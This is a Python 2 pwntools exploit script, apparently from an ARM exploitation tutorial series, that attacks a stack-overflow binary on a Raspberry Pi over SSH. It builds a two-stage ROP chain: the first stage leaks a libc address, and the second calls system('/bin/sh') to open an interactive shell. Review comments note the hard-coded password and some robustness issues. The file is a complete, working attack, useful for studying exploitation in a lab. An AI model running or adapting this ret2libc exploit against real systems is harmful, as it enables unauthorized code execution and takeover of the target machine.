#!/usr/bin/env python2
from pwn import *
# Target connection parameters.  The password is a hard-coded placeholder
# committed with the source; it should come from an environment variable
# or an untracked config file, and be rotated if it was ever a real one.
ip = "192.168.0.13"
port = 22
user = "pi"
pwd = "toSet"
# Local copy of the target's libc.  Every offset computed below comes from
# this file's symbol table, so it must be the exact build present on the
# target or the derived addresses are wrong.
libc = ELF('libc-2.24.so')
# Open the SSH session and launch the vulnerable binary on the target;
# `sh` is the process handle used for all further I/O with it.
shell = ssh(user, ip, password=pwd, port=port)
sh = shell.run('/home/pi/arm/episode3/stack_overflow')
# Stage 1: 64 bytes of padding reach the saved return address, then a ROP
# chain calls write(1, 0x2100c, 4) to leak the 4 bytes stored at 0x2100c
# (the address of read, per the comments below).  "A"*64 is a byte string
# only under Python 2 (see the shebang); Python 3 would need b"A".
payload = "A"*64
payload += p32(0x1) # r0 - standard output
payload += p32(0x1046C) # rop gadget pop {r0, r1, r2, lr}; bx lr
payload += p32(0x2100c) # r1 - address of read
payload += p32(0x4) # r2 - number of bytes to write
payload += p32(0x104C8) # lr - address of write
payload += p32(0x00) # not used
payload += p32(0x10488) # jump to the read - 0x104d4 <main+36> pop {r11, pc}
sh.sendline(payload)
# get the read address
# NOTE(review): recv(4) returns *up to* 4 bytes; u32() needs exactly 4, so a
# short read aborts the script here rather than silently mis-parsing.
read_address = u32(sh.recv(4))
log.info('address of the read: %#x' % read_address)
# get the libc_base address: leaked read minus its offset in the local libc
libc_base_address = read_address - libc.symbols['read']
# get the system address by rebasing its offset from the local libc
system_address = libc_base_address + libc.symbols['system']
log.info('address of the system: %#x' % system_address)
# first occurrence of "/bin/sh" in the local libc, rebased to the target
shell_address = libc_base_address + next(libc.search("/bin/sh"))
# Stage 2: same padding and gadget, this time with r0 = shell_address and
# lr = system_address so the gadget's `bx lr` lands in system("/bin/sh").
payload = "A"*64
payload += p32(shell_address) # r0 - /bin/sh address
payload += p32(0x1046C) # rop gadget pop {r0, r1, r2, lr}; bx lr
payload += p32(0x00) # r1 - not used
payload += p32(0x00) # r2 - not used
payload += p32(system_address) # lr - address of the system
sh.sendline(payload)
# Hand the session to the user.  shell.close() only runs if interactive()
# returns normally; an exception or Ctrl-C leaves the SSH session open
# (a try/finally around the session would guarantee cleanup).
sh.interactive()
shell.close()